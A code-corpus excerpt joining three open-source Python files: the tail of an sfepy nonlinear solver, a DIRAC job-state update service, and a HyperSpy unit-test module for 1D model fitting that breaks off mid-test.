                plu.pylab.subplot( 2, 2, 2 )
                plu.pylab.plot( vec_r )
                plu.pylab.ylabel( r'$r$' )
                plu.pylab.subplot( 2, 2, 4 )
                plu.pylab.plot( vec_dx )
                plu.pylab.ylabel( r'$\_delta x$' )
                plu.pylab.subplot( 2, 2, 3 )
                plu.pylab.plot( vec_x )
                plu.pylab.ylabel( r'$x_i$' )
                plu.pylab.draw()
                plu.pylab.ioff()
                pause()

            it += 1

##         import pylab as p
##         problem = evaluator.problem
##         r0 = problem.variables.make_full_vec( vec_r, force_value = 0.0 )
##         dx = nm.zeros_like( vec_dx )
##         ii = problem.variables.get_indx( 'r', stripped = True )
##         dx[ii] = 1.0
##         r1 = problem.variables.make_full_vec( mtx_a * dx, force_value = 0.0 )
##         p.plot( r0 )
##         p.plot( r1 )
##         vv = nm.where( nm.abs( r1 ) > 1e-12, 1.0, 0.0 )
##         problem.save_state_to_vtk( 'sd.vtk', vv )
##         nodes = problem.variables.get_nodes_of_global_dofs( nm.where( vv > 0.5 )[0] )
##         print nodes
##         # problem.save_regions( 'asdsd' )
##         p.show()

        if status is not None:
            status['time_stats'] = time_stats
            status['err0'] = err0
            status['err'] = err
            status['condition'] = condition

        return vec_x
| certik/sfepy | sfepy/solvers/nls.py | Python | bsd-3-clause | 9,028 | [
"VTK"
] | 6ed47d6d78b53d84ef1c8c9b2ae8bfac75a77bd09445369e214d59ae94531314 |
""" JobStateUpdateHandler is the implementation of the Job State updating
service in the DISET framework
The following methods are available in the Service interface
setJobStatus()
"""
from __future__ import absolute_import
import six
from six.moves import range
__RCSID__ = "$Id$"
import time
from DIRAC import S_OK, S_ERROR
from DIRAC.Core.DISET.RequestHandler import RequestHandler
from DIRAC.Core.Utilities import Time
from DIRAC.ConfigurationSystem.Client.Helpers.Operations import Operations
from DIRAC.WorkloadManagementSystem.DB.JobDB import JobDB
from DIRAC.WorkloadManagementSystem.DB.ElasticJobDB import ElasticJobDB
from DIRAC.WorkloadManagementSystem.DB.JobLoggingDB import JobLoggingDB
# This is a global instance of the JobDB class
jobDB = False
logDB = False
elasticJobDB = False
JOB_FINAL_STATES = ['Done', 'Completed', 'Failed']
def initializeJobStateUpdateHandler(serviceInfo):
  """Service initialization: create the module-level JobDB and
  JobLoggingDB instances shared by all handler calls.

  :param serviceInfo: DISET service information (unused here)
  :returns: S_OK
  """
  global jobDB
  global logDB
  jobDB = JobDB()
  logDB = JobLoggingDB()
  return S_OK()
class JobStateUpdateHandler(RequestHandler):
def initialize(self):
"""
Flags gESFlag and gMySQLFlag have bool values (True/False)
derived from dirac.cfg configuration file
Determines the switching of ElasticSearch and MySQL backends
"""
global elasticJobDB
useESForJobParametersFlag = Operations().getValue('/Services/JobMonitoring/useESForJobParametersFlag', False)
if useESForJobParametersFlag:
elasticJobDB = ElasticJobDB()
self.log.verbose("Using ElasticSearch for JobParameters")
return S_OK()
###########################################################################
types_updateJobFromStager = [[six.string_types, int], six.string_types]
def export_updateJobFromStager(self, jobID, status):
""" Simple call back method to be used by the stager. """
if status == 'Done':
jobStatus = 'Checking'
minorStatus = 'JobScheduling'
elif status == 'Failed':
jobStatus = 'Failed'
minorStatus = 'Staging input files failed'
else:
return S_ERROR("updateJobFromStager: %s status not known." % status)
infoStr = None
trials = 10
for i in range(trials):
result = jobDB.getJobAttributes(jobID, ['Status'])
if not result['OK']:
return result
if not result['Value']:
# if there is no matching Job it returns an empty dictionary
return S_OK('No Matching Job')
status = result['Value']['Status']
if status == 'Staging':
if i:
infoStr = "Found job in Staging after %d seconds" % i
break
time.sleep(1)
if status != 'Staging':
return S_OK('Job is not in Staging after %d seconds' % trials)
result = self.__setJobStatus(int(jobID), jobStatus, minorStatus, 'StagerSystem', None)
if not result['OK']:
if result['Message'].find('does not exist') != -1:
return S_OK()
if infoStr:
return S_OK(infoStr)
return result
###########################################################################
  types_setJobStatus = [[six.string_types, int]]

  def export_setJobStatus(self, jobID, status='', minorStatus='', source='Unknown', datetime=None):
    """ Set the major and minor status for job specified by its JobId.
        Set optionally the status date and source component which sends the
        status information.

        :returns: S_OK / S_ERROR from the underlying DB update
    """
    return self.__setJobStatus(int(jobID), status, minorStatus, source, datetime)
###########################################################################
  types_setJobsStatus = [list]

  def export_setJobsStatus(self, jobIDs, status='', minorStatus='', source='Unknown', datetime=None):
    """ Set the major and minor status for each job in the jobIDs list.
        Set optionally the status date and source component which sends the
        status information.

        NOTE(review): failures of individual per-job updates are ignored;
        S_OK is returned unconditionally.
    """
    for jobID in jobIDs:
      self.__setJobStatus(int(jobID), status, minorStatus, source, datetime)
    return S_OK()
  def __setJobStatus(self, jobID, status, minorStatus, source, datetime):
    """ update the job status.

        Writes the new status to the JobDB, maintains start/end execution
        timestamps, then records the *resulting* state in the JobLoggingDB.
    """
    result = jobDB.setJobStatus(jobID, status, minorStatus)
    if not result['OK']:
      return result

    # Maintain execution timestamps driven by the status transition.
    if status in JOB_FINAL_STATES:
      result = jobDB.setEndExecTime(jobID)
    if status == 'Running' and minorStatus == 'Application':
      result = jobDB.setStartExecTime(jobID)

    # Re-read what was actually stored: setJobStatus may keep previous
    # values when the arguments are empty, and the logging record below
    # must reflect the resulting state, not the requested one.
    result = jobDB.getJobAttributes(jobID, ['Status', 'MinorStatus'])
    if not result['OK']:
      return result
    if not result['Value']:
      return S_ERROR('Job %d does not exist' % int(jobID))

    status = result['Value']['Status']
    minorStatus = result['Value']['MinorStatus']
    if datetime:
      result = logDB.addLoggingRecord(jobID, status, minorStatus, datetime, source)
    else:
      result = logDB.addLoggingRecord(jobID, status, minorStatus, source=source)
    return result
  ###########################################################################
  types_setJobStatusBulk = [[six.string_types, int], dict]

  def export_setJobStatusBulk(self, jobID, statusDict):
    """ Set various status fields for job specified by its JobId.
        Set only the last status in the JobDB, updating all the status
        logging information in the JobLoggingDB. The statusDict has datetime
        as a key and status information dictionary as values
    """
    status = ""
    minor = ""
    application = ""
    appCounter = ""
    endDate = ''
    startDate = ''
    startFlag = ''
    jobID = int(jobID)

    result = jobDB.getJobAttributes(jobID, ['Status'])
    if not result['OK']:
      return result
    if not result['Value']:
      # if there is no matching Job it returns an empty dictionary
      return S_ERROR('No Matching Job')
    new_status = result['Value']['Status']
    if new_status == "Stalled":
      # A heartbeat-driven bulk update means the job is alive again.
      status = 'Running'

    # Get the latest WN time stamps of status updates
    result = logDB.getWMSTimeStamps(int(jobID))
    if not result['OK']:
      return result
    # Most recent recorded update (the 'LastTime' entry is a sentinel, skip it).
    lastTime = max([float(t) for s, t in result['Value'].items() if s != 'LastTime'])
    lastTime = Time.toString(Time.fromEpoch(lastTime))

    # Get the last status values
    dates = sorted(statusDict)
    # We should only update the status if its time stamp is more recent than the last update
    # Walk the new records in chronological order, keeping the last non-empty
    # value of each field; also derive start/end execution dates on the way.
    for date in [date for date in dates if date >= lastTime]:
      sDict = statusDict[date]
      if sDict['Status']:
        status = sDict['Status']
        if status in JOB_FINAL_STATES:
          endDate = date
        if status == "Running":
          startFlag = 'Running'
      if sDict['MinorStatus']:
        minor = sDict['MinorStatus']
        # Start of the application phase marks the start of execution.
        if minor == "Application" and startFlag == 'Running':
          startDate = date
      if sDict['ApplicationStatus']:
        application = sDict['ApplicationStatus']
      counter = sDict.get('ApplicationCounter')
      if counter:
        appCounter = counter

    # Store only the fields that actually received a value.
    attrNames = []
    attrValues = []
    if status:
      attrNames.append('Status')
      attrValues.append(status)
    if minor:
      attrNames.append('MinorStatus')
      attrValues.append(minor)
    if application:
      attrNames.append('ApplicationStatus')
      attrValues.append(application)
    if appCounter:
      attrNames.append('ApplicationCounter')
      attrValues.append(appCounter)
    result = jobDB.setJobAttributes(jobID, attrNames, attrValues, update=True)
    if not result['OK']:
      return result

    if endDate:
      result = jobDB.setEndExecTime(jobID, endDate)
    if startDate:
      result = jobDB.setStartExecTime(jobID, startDate)

    # Update the JobLoggingDB records
    # Every record is logged (even those older than lastTime); empty fields
    # are stored as the 'idem' marker meaning "unchanged".
    for date in dates:
      sDict = statusDict[date]
      status = sDict['Status']
      if not status:
        status = 'idem'
      minor = sDict['MinorStatus']
      if not minor:
        minor = 'idem'
      application = sDict['ApplicationStatus']
      if not application:
        application = 'idem'
      source = sDict['Source']
      result = logDB.addLoggingRecord(jobID, status, minor, application, date, source)
      if not result['OK']:
        return result

    return S_OK()
###########################################################################
types_setJobSite = [[six.string_types, int], six.string_types]
def export_setJobSite(self, jobID, site):
"""Allows the site attribute to be set for a job specified by its jobID.
"""
result = jobDB.setJobAttribute(int(jobID), 'Site', site)
return result
###########################################################################
types_setJobFlag = [[six.string_types, int], six.string_types]
def export_setJobFlag(self, jobID, flag):
""" Set job flag for job with jobID
"""
result = jobDB.setJobAttribute(int(jobID), flag, 'True')
return result
###########################################################################
types_unsetJobFlag = [[six.string_types, int], six.string_types]
def export_unsetJobFlag(self, jobID, flag):
""" Unset job flag for job with jobID
"""
result = jobDB.setJobAttribute(int(jobID), flag, 'False')
return result
  ###########################################################################
  types_setJobApplicationStatus = [[six.string_types, int], six.string_types, six.string_types]

  def export_setJobApplicationStatus(self, jobID, appStatus, source='Unknown'):
    """ Set the application status for job specified by its JobId.

        An application heartbeat implies the job is alive, so jobs found in
        'Stalled' or 'Matched' are promoted back to 'Running'.
    """
    result = jobDB.getJobAttributes(int(jobID), ['Status', 'MinorStatus'])
    if not result['OK']:
      return result
    if not result['Value']:
      # if there is no matching Job it returns an empty dictionary
      return S_ERROR('No Matching Job')

    status = result['Value']['Status']
    if status == "Stalled" or status == "Matched":
      newStatus = 'Running'
    else:
      newStatus = status
    minorStatus = result['Value']['MinorStatus']

    result = jobDB.setJobStatus(int(jobID), status=newStatus, minor=minorStatus, application=appStatus)
    if not result['OK']:
      return result

    result = logDB.addLoggingRecord(int(jobID), newStatus, minorStatus, appStatus, source=source)
    return result
###########################################################################
types_setJobParameter = [[six.string_types, int], six.string_types, six.string_types]
def export_setJobParameter(self, jobID, name, value):
""" Set arbitrary parameter specified by name/value pair
for job specified by its JobId
"""
if elasticJobDB:
return elasticJobDB.setJobParameter(int(jobID), name, value)
return jobDB.setJobParameter(int(jobID), name, value)
###########################################################################
types_setJobsParameter = [dict]
def export_setJobsParameter(self, jobsParameterDict):
""" Set arbitrary parameter specified by name/value pair
for job specified by its JobId
"""
for jobID in jobsParameterDict:
if elasticJobDB:
res = elasticJobDB.setJobParameter(jobID,
str(jobsParameterDict[jobID][0]),
str(jobsParameterDict[jobID][1]))
if not res['OK']:
self.log.error('Failed to add Job Parameter to elasticJobDB', res['Message'])
else:
res = jobDB.setJobParameter(jobID,
str(jobsParameterDict[jobID][0]),
str(jobsParameterDict[jobID][1]))
if not res['OK']:
self.log.error('Failed to add Job Parameter to MySQL', res['Message'])
return S_OK()
###########################################################################
types_setJobParameters = [[six.string_types, int], list]
def export_setJobParameters(self, jobID, parameters):
""" Set arbitrary parameters specified by a list of name/value pairs
for job specified by its JobId
"""
result = jobDB.setJobParameters(int(jobID), parameters)
if not result['OK']:
return S_ERROR('Failed to store some of the parameters')
return S_OK('All parameters stored for job')
  ###########################################################################
  types_sendHeartBeat = [[six.string_types, int], dict, dict]

  def export_sendHeartBeat(self, jobID, dynamicData, staticData):
    """ Send a heart beat sign of life for a job jobID.

        Stores the heartbeat payloads, restores 'Running' status for jobs
        wrongly marked Stalled/Matched, and returns any pending commands
        queued for the job (marking them as 'Sent').
    """
    result = jobDB.setHeartBeatData(int(jobID), staticData, dynamicData)
    if not result['OK']:
      # Best effort: a failed heartbeat write must not break the callback.
      self.log.warn('Failed to set the heart beat data', 'for job %d ' % int(jobID))

    # Restore the Running status if necessary
    result = jobDB.getJobAttributes(jobID, ['Status'])
    if not result['OK']:
      return result
    if not result['Value']:
      return S_ERROR('Job %d not found' % jobID)
    status = result['Value']['Status']
    if status == "Stalled" or status == "Matched":
      result = jobDB.setJobAttribute(jobID, 'Status', 'Running', True)
      if not result['OK']:
        self.log.warn('Failed to restore the job status to Running')

    # Collect any commands queued for the job and hand them back to the
    # pilot, flagging each one as dispatched.
    jobMessageDict = {}
    result = jobDB.getJobCommand(int(jobID))
    if result['OK']:
      jobMessageDict = result['Value']

    if jobMessageDict:
      for key, _value in jobMessageDict.items():
        result = jobDB.setJobCommandStatus(int(jobID), key, 'Sent')

    return S_OK(jobMessageDict)
| fstagni/DIRAC | WorkloadManagementSystem/Service/JobStateUpdateHandler.py | Python | gpl-3.0 | 13,370 | [
"DIRAC"
] | 61b3bd66857cb601a7a8c6a677691638e2c9315a136bbacabfc2ca4bb48b425c |
from distutils.version import StrictVersion
import numpy as np
import scipy
import nose.tools as nt
from unittest import mock
from nose.plugins.skip import SkipTest
import hyperspy.api as hs
from hyperspy.misc.utils import slugify
class TestModelJacobians:
    """Unit tests for Model1D._jacobian with and without convolution."""

    def setUp(self):
        # Minimal 1-point signal; the model internals are mocked/forced by hand.
        s = hs.signals.Signal1D(np.zeros(1))
        m = s.create_model()
        self.low_loss = 7.
        self.weights = 0.3
        m.axis.axis = np.array([1, 0])
        # Only the second channel is active.
        m.channel_switches = np.array([0, 1], dtype=bool)
        m.append(hs.model.components1D.Gaussian())
        m[0].A.value = 1
        m[0].centre.value = 2.
        # Twinned parameter: sigma follows centre, so their gradients add up
        # in the jacobian row of the shared free parameter.
        m[0].sigma.twin = m[0].centre
        m._low_loss = mock.MagicMock()
        m.low_loss.return_value = self.low_loss
        self.model = m
        m.convolution_axis = np.zeros(2)

    def test_jacobian_not_convolved(self):
        m = self.model
        m.convolved = False
        jac = m._jacobian((1, 2, 3), None, weights=self.weights)
        # Expected rows: dA, and d(sigma)+d(centre) for the twinned pair,
        # all scaled by the weights.
        np.testing.assert_array_almost_equal(jac.squeeze(), self.weights *
                                             np.array([m[0].A.grad(0),
                                                       m[0].sigma.grad(0) +
                                                       m[0].centre.grad(0)]))
        # Parameter values were fetched from the supplied p0 tuple.
        nt.assert_equal(m[0].A.value, 1)
        nt.assert_equal(m[0].centre.value, 2)
        nt.assert_equal(m[0].sigma.value, 2)

    def test_jacobian_convolved(self):
        m = self.model
        m.convolved = True
        m.append(hs.model.components1D.Gaussian())
        # First component bypasses convolution; second is convolved, so its
        # gradient rows are multiplied by the (mocked) low-loss value.
        m[0].convolved = False
        m[1].convolved = True
        jac = m._jacobian((1, 2, 3, 4, 5), None, weights=self.weights)
        np.testing.assert_array_almost_equal(jac.squeeze(), self.weights *
                                             np.array([m[0].A.grad(0),
                                                       m[0].sigma.grad(0) +
                                                       m[0].centre.grad(0),
                                                       m[1].A.grad(0) *
                                                       self.low_loss,
                                                       m[1].centre.grad(0) *
                                                       self.low_loss,
                                                       m[1].sigma.grad(0) *
                                                       self.low_loss,
                                                       ]))
        nt.assert_equal(m[0].A.value, 1)
        nt.assert_equal(m[0].centre.value, 2)
        nt.assert_equal(m[0].sigma.value, 2)
        nt.assert_equal(m[1].A.value, 3)
        nt.assert_equal(m[1].centre.value, 4)
        nt.assert_equal(m[1].sigma.value, 5)
class TestModelCallMethod:
    """Unit tests for Model1D.__call__ (model evaluation)."""

    def setUp(self):
        s = hs.signals.Signal1D(np.empty(1))
        m = s.create_model()
        # Two identical Gaussians so sums are simple multiples of one.
        m.append(hs.model.components1D.Gaussian())
        m.append(hs.model.components1D.Gaussian())
        self.model = m

    def test_call_method_no_convolutions(self):
        m = self.model
        m.convolved = False
        m[1].active = False
        r1 = m()
        r2 = m(onlyactive=True)
        # onlyactive=False counts the inactive component too.
        np.testing.assert_almost_equal(m[0].function(0) * 2, r1)
        np.testing.assert_almost_equal(m[0].function(0), r2)
        # With non_convolved=True the convolved flag must be ignored.
        m.convolved = True
        r1 = m(non_convolved=True)
        r2 = m(non_convolved=True, onlyactive=True)
        np.testing.assert_almost_equal(m[0].function(0) * 2, r1)
        np.testing.assert_almost_equal(m[0].function(0), r2)

    def test_call_method_with_convolutions(self):
        m = self.model
        m._low_loss = mock.MagicMock()
        m.low_loss.return_value = 0.3
        m.convolved = True
        m.append(hs.model.components1D.Gaussian())
        m[1].active = False
        # Only m[0] is convolved: its contribution is scaled by the mocked
        # low-loss factor (0.3) on top of the unconvolved terms.
        m[0].convolved = True
        m[1].convolved = False
        m[2].convolved = False
        m.convolution_axis = np.array([0., ])
        r1 = m()
        r2 = m(onlyactive=True)
        np.testing.assert_almost_equal(m[0].function(0) * 2.3, r1)
        np.testing.assert_almost_equal(m[0].function(0) * 1.3, r2)

    def test_call_method_binned(self):
        m = self.model
        m.convolved = False
        m.remove(1)
        # Binned signals scale the model by the axis step width.
        m.signal.metadata.Signal.binned = True
        m.signal.axes_manager[-1].scale = 0.3
        r1 = m()
        np.testing.assert_almost_equal(m[0].function(0) * 0.3, r1)
class TestModelPlotCall:
    """Unit tests for Model1D._model2plot (values used by the plot)."""

    def setUp(self):
        s = hs.signals.Signal1D(np.empty(1))
        m = s.create_model()
        # Mock out evaluation entirely; only the plumbing is under test.
        m.__call__ = mock.MagicMock()
        m.__call__.return_value = np.array([0.5, 0.25])
        m.axis = mock.MagicMock()
        m.fetch_stored_values = mock.MagicMock()
        # Two active channels out of five.
        m.channel_switches = np.array([0, 1, 1, 0, 0], dtype=bool)
        self.model = m

    def test_model2plot_own_am(self):
        m = self.model
        m.axis.axis.shape = (5,)
        res = m._model2plot(m.axes_manager)
        # Out-of-range (switched-off) channels are padded with NaN.
        np.testing.assert_array_equal(
            res, np.array([np.nan, 0.5, 0.25, np.nan, np.nan]))
        nt.assert_true(m.__call__.called)
        nt.assert_dict_equal(
            m.__call__.call_args[1], {
                'non_convolved': False, 'onlyactive': True})
        # Same axes_manager: no need to fetch/restore stored values.
        nt.assert_false(m.fetch_stored_values.called)

    def test_model2plot_other_am(self):
        m = self.model
        res = m._model2plot(m.axes_manager.deepcopy(), out_of_range2nans=False)
        np.testing.assert_array_equal(res, np.array([0.5, 0.25]))
        nt.assert_true(m.__call__.called)
        nt.assert_dict_equal(
            m.__call__.call_args[1], {
                'non_convolved': False, 'onlyactive': True})
        # Foreign axes_manager: values fetched before and restored after.
        nt.assert_equal(2, m.fetch_stored_values.call_count)
class TestModelSettingPZero:
    """Unit tests for p0 assembly, fetching and boundary bookkeeping."""

    def setUp(self):
        s = hs.signals.Signal1D(np.empty(1))
        m = s.create_model()
        m.append(hs.model.components1D.Gaussian())
        m[0].A.value = 1.1
        # centre is made a 2-element parameter to exercise tuple handling.
        m[0].centre._number_of_elements = 2
        m[0].centre.value = (2.2, 3.3)
        m[0].sigma.value = 4.4
        m[0].sigma.free = False
        m[0].A._bounds = (0.1, 0.11)
        m[0].centre._bounds = ((0.2, 0.21), (0.3, 0.31))
        m[0].sigma._bounds = (0.4, 0.41)
        self.model = m

    def test_setting_p0(self):
        m = self.model
        m.append(hs.model.components1D.Gaussian())
        m[-1].active = False
        m.p0 = None
        m._set_p0()
        # Only free parameters of active components: A plus both centre
        # elements (sigma is fixed, second Gaussian inactive).
        nt.assert_equal(m.p0, (1.1, 2.2, 3.3))

    def test_fetching_from_p0(self):
        m = self.model
        m.append(hs.model.components1D.Gaussian())
        m[-1].active = False
        m[-1].A.value = 100
        m[-1].sigma.value = 200
        m[-1].centre.value = 300
        # Extra p0 entries beyond the free parameters must be ignored.
        m.p0 = (1.2, 2.3, 3.4, 5.6, 6.7, 7.8)
        m._fetch_values_from_p0()
        nt.assert_equal(m[0].A.value, 1.2)
        nt.assert_equal(m[0].centre.value, (2.3, 3.4))
        # Fixed and inactive parameters retain their previous values.
        nt.assert_equal(m[0].sigma.value, 4.4)
        nt.assert_equal(m[1].A.value, 100)
        nt.assert_equal(m[1].sigma.value, 200)
        nt.assert_equal(m[1].centre.value, 300)

    def test_setting_boundaries(self):
        m = self.model
        m.append(hs.model.components1D.Gaussian())
        m[-1].active = False
        m.set_boundaries()
        nt.assert_equal(m.free_parameters_boundaries,
                        [(0.1, 0.11), (0.2, 0.21), (0.3, 0.31)])

    def test_setting_mpfit_parameters_info(self):
        m = self.model
        # Open one side of each bound to check the 'limited' flags.
        m[0].A.bmax = None
        m[0].centre.bmin = None
        m[0].centre.bmax = 0.31
        m.append(hs.model.components1D.Gaussian())
        m[-1].active = False
        m.set_mpfit_parameters_info()
        nt.assert_equal(m.mpfit_parinfo,
                        [{'limited': [True, False],
                          'limits': [0.1, 0]},
                         {'limited': [False, True],
                          'limits': [0, 0.31]},
                         {'limited': [False, True],
                          'limits': [0, 0.31]},
                         ])
class TestModel1D:
    """General Model1D behaviour: error functions, component management,
    name lookup, the ``components`` attribute class and bound snapping.

    Fixes relative to the previous revision:
    - the second, duplicate definition of
      ``test_components_class_change_name_del_default`` silently shadowed
      the first (so it never ran); renamed to
      ``test_components_class_change_invalid_name_del_default``;
    - the bare ``except:`` around the ipywidgets import now catches only
      ``ImportError``.
    """

    def setUp(self):
        s = hs.signals.Signal1D(np.empty(1))
        m = s.create_model()
        self.model = m

    def test_errfunc(self):
        m = self.model
        m._model_function = mock.MagicMock()
        m._model_function.return_value = 3.
        # errfunc = (model - data), optionally scaled by weights.
        np.testing.assert_equal(m._errfunc(None, 1., None), 2.)
        np.testing.assert_equal(m._errfunc(None, 1., 0.3), 0.6)

    def test_errfunc2(self):
        m = self.model
        m._model_function = mock.MagicMock()
        m._model_function.return_value = 3. * np.ones(2)
        # errfunc2 = sum of squared (weighted) residuals.
        np.testing.assert_equal(m._errfunc2(None, np.ones(2), None), 2 * 4.)
        np.testing.assert_equal(m._errfunc2(None, np.ones(2), 0.3), 2 * 0.36)

    def test_gradient_ls(self):
        m = self.model
        m._errfunc = mock.MagicMock()
        m._errfunc.return_value = 0.1
        m._jacobian = mock.MagicMock()
        m._jacobian.return_value = np.ones((1, 2)) * 7.
        np.testing.assert_equal(m._gradient_ls(None, None), 2 * 0.1 * 7 * 2)

    def test_gradient_ml(self):
        m = self.model
        m._model_function = mock.MagicMock()
        m._model_function.return_value = 3. * np.ones(2)
        m._jacobian = mock.MagicMock()
        m._jacobian.return_value = np.ones((1, 2)) * 7.
        np.testing.assert_equal(
            m._gradient_ml(None, 1.2), -2 * 7 * (1.2 / 3 - 1))

    def test_model_function(self):
        m = self.model
        m.append(hs.model.components1D.Gaussian())
        m[0].A.value = 1.3
        m[0].centre.value = 0.003
        m[0].sigma.value = 0.1
        param = (100, 0.1, 0.2)
        np.testing.assert_array_almost_equal(176.03266338,
                                             m._model_function(param))
        # The parameter tuple is written back into the component.
        nt.assert_equal(m[0].A.value, 100)
        nt.assert_equal(m[0].centre.value, 0.1)
        nt.assert_equal(m[0].sigma.value, 0.2)

    @nt.raises(ValueError)
    def test_append_existing_component(self):
        g = hs.model.components1D.Gaussian()
        m = self.model
        m.append(g)
        m.append(g)

    def test_append_component(self):
        g = hs.model.components1D.Gaussian()
        m = self.model
        m.append(g)
        nt.assert_in(g, m)
        nt.assert_is(g.model, m)
        nt.assert_is(g._axes_manager, m.axes_manager)
        # Appending creates the parameter maps.
        nt.assert_true(all([hasattr(p, 'map') for p in g.parameters]))

    def test_calculating_convolution_axis(self):
        m = self.model
        # setup
        m.axis.offset = 10
        m.axis.size = 10
        ll_axis = mock.MagicMock()
        ll_axis.size = 7
        ll_axis.value2index.return_value = 3
        m._low_loss = mock.MagicMock()
        m.low_loss.axes_manager.signal_axes = [ll_axis, ]
        # calculation
        m.set_convolution_axis()
        # tests: axis is padded on both sides by the low-loss extent.
        np.testing.assert_array_equal(m.convolution_axis, np.arange(7, 23))
        np.testing.assert_equal(ll_axis.value2index.call_args[0][0], 0)

    def test_notebook_interactions(self):
        try:
            import ipywidgets
        except ImportError:  # was a bare except: only a missing package should skip
            raise SkipTest("ipywidgets not installed")
        if StrictVersion(ipywidgets.__version__) < StrictVersion("5.0"):
            raise SkipTest("ipywidgets > 5.0 required but %s installed" %
                           ipywidgets.__version__)
        # Smoke test: the widget constructors must not raise.
        m = self.model
        m.notebook_interaction()
        m.append(hs.model.components1D.Offset())
        m[0].notebook_interaction()
        m[0].offset.notebook_interaction()

    def test_access_component_by_name(self):
        m = self.model
        g1 = hs.model.components1D.Gaussian()
        g2 = hs.model.components1D.Gaussian()
        g2.name = "test"
        m.extend((g1, g2))
        nt.assert_is(m["test"], g2)

    def test_access_component_by_index(self):
        m = self.model
        g1 = hs.model.components1D.Gaussian()
        g2 = hs.model.components1D.Gaussian()
        g2.name = "test"
        m.extend((g1, g2))
        nt.assert_is(m[1], g2)

    def test_component_name_when_append(self):
        # Duplicate default names get numeric suffixes.
        m = self.model
        gs = [
            hs.model.components1D.Gaussian(),
            hs.model.components1D.Gaussian(),
            hs.model.components1D.Gaussian()]
        m.extend(gs)
        nt.assert_is(m['Gaussian'], gs[0])
        nt.assert_is(m['Gaussian_0'], gs[1])
        nt.assert_is(m['Gaussian_1'], gs[2])

    @nt.raises(ValueError)
    def test_several_component_with_same_name(self):
        m = self.model
        gs = [
            hs.model.components1D.Gaussian(),
            hs.model.components1D.Gaussian(),
            hs.model.components1D.Gaussian()]
        m.extend(gs)
        # Force a name clash behind the model's back; lookup must raise.
        m[0]._name = "hs.model.components1D.Gaussian"
        m[1]._name = "hs.model.components1D.Gaussian"
        m[2]._name = "hs.model.components1D.Gaussian"
        m['Gaussian']

    @nt.raises(ValueError)
    def test_no_component_with_that_name(self):
        m = self.model
        m['Voigt']

    @nt.raises(ValueError)
    def test_component_already_in_model(self):
        m = self.model
        g1 = hs.model.components1D.Gaussian()
        m.extend((g1, g1))

    def test_remove_component(self):
        m = self.model
        g1 = hs.model.components1D.Gaussian()
        m.append(g1)
        m.remove(g1)
        nt.assert_equal(len(m), 0)

    def test_remove_component_by_index(self):
        m = self.model
        g1 = hs.model.components1D.Gaussian()
        m.append(g1)
        m.remove(0)
        nt.assert_equal(len(m), 0)

    def test_remove_component_by_name(self):
        m = self.model
        g1 = hs.model.components1D.Gaussian()
        m.append(g1)
        m.remove(g1.name)
        nt.assert_equal(len(m), 0)

    def test_delete_component_by_index(self):
        m = self.model
        g1 = hs.model.components1D.Gaussian()
        m.append(g1)
        del m[0]
        nt.assert_not_in(g1, m)

    def test_delete_component_by_name(self):
        m = self.model
        g1 = hs.model.components1D.Gaussian()
        m.append(g1)
        del m[g1.name]
        nt.assert_not_in(g1, m)

    def test_delete_slice(self):
        m = self.model
        g1 = hs.model.components1D.Gaussian()
        g2 = hs.model.components1D.Gaussian()
        g3 = hs.model.components1D.Gaussian()
        m.extend([g1, g2, g3])
        del m[:2]
        nt.assert_not_in(g1, m)
        nt.assert_not_in(g2, m)
        nt.assert_in(g3, m)

    def test_get_component_by_name(self):
        m = self.model
        g1 = hs.model.components1D.Gaussian()
        g2 = hs.model.components1D.Gaussian()
        g2.name = "test"
        m.extend((g1, g2))
        nt.assert_is(m._get_component("test"), g2)

    def test_get_component_by_index(self):
        m = self.model
        g1 = hs.model.components1D.Gaussian()
        g2 = hs.model.components1D.Gaussian()
        g2.name = "test"
        m.extend((g1, g2))
        nt.assert_is(m._get_component(1), g2)

    def test_get_component_by_component(self):
        m = self.model
        g1 = hs.model.components1D.Gaussian()
        g2 = hs.model.components1D.Gaussian()
        g2.name = "test"
        m.extend((g1, g2))
        nt.assert_is(m._get_component(g2), g2)

    @nt.raises(ValueError)
    def test_get_component_wrong(self):
        m = self.model
        g1 = hs.model.components1D.Gaussian()
        g2 = hs.model.components1D.Gaussian()
        g2.name = "test"
        m.extend((g1, g2))
        m._get_component(1.2)

    def test_components_class_default(self):
        m = self.model
        g1 = hs.model.components1D.Gaussian()
        m.append(g1)
        nt.assert_is(getattr(m.components, g1.name), g1)

    def test_components_class_change_name(self):
        m = self.model
        g1 = hs.model.components1D.Gaussian()
        m.append(g1)
        g1.name = "test"
        nt.assert_is(getattr(m.components, g1.name), g1)

    @nt.raises(AttributeError)
    def test_components_class_change_name_del_default(self):
        # After renaming, the old attribute must be gone.
        m = self.model
        g1 = hs.model.components1D.Gaussian()
        m.append(g1)
        g1.name = "test"
        getattr(m.components, "Gaussian")

    def test_components_class_change_invalid_name(self):
        # Invalid Python identifiers are exposed via their slugified form.
        m = self.model
        g1 = hs.model.components1D.Gaussian()
        m.append(g1)
        g1.name = "1, Test This!"
        nt.assert_is(
            getattr(m.components,
                    slugify(g1.name, valid_variable_name=True)), g1)

    @nt.raises(AttributeError)
    def test_components_class_change_invalid_name_del_default(self):
        # Renamed from a duplicate of test_components_class_change_name_del_default
        # that shadowed it: renaming away from an invalid name must delete
        # the slugified attribute too.
        m = self.model
        g1 = hs.model.components1D.Gaussian()
        m.append(g1)
        invalid_name = "1, Test This!"
        g1.name = invalid_name
        g1.name = "test"
        getattr(m.components, slugify(invalid_name))

    def test_snap_parameter_bounds(self):
        m = self.model
        g1 = hs.model.components1D.Gaussian()
        m.append(g1)
        g2 = hs.model.components1D.Gaussian()
        m.append(g2)
        g3 = hs.model.components1D.Gaussian()
        m.append(g3)
        g4 = hs.model.components1D.Gaussian()
        m.append(g4)
        p = hs.model.components1D.Polynomial(3)
        m.append(p)

        g1.A.value = 3.
        g1.centre.bmin = 300.
        g1.centre.value = 1.
        g1.sigma.bmax = 15.
        g1.sigma.value = 30

        g2.A.value = 1
        g2.A.bmin = 0.
        g2.A.bmax = 3.
        g2.centre.value = 0
        g2.centre.bmin = 1
        g2.centre.bmax = 3.
        g2.sigma.value = 4
        g2.sigma.bmin = 1
        g2.sigma.bmax = 3.

        # g3: parameters not free / not snapped despite being out of bounds.
        g3.A.bmin = 0
        g3.A.value = -3
        g3.A.free = False
        g3.centre.value = 15
        g3.centre.bmax = 10
        g3.centre.free = False
        g3.sigma.value = 1
        g3.sigma.bmin = 0
        g3.sigma.bmax = 0

        # g4: inactive component, must be left untouched.
        g4.active = False
        g4.A.value = 300
        g4.A.bmin = 500
        g4.centre.value = 0
        g4.centre.bmax = -1
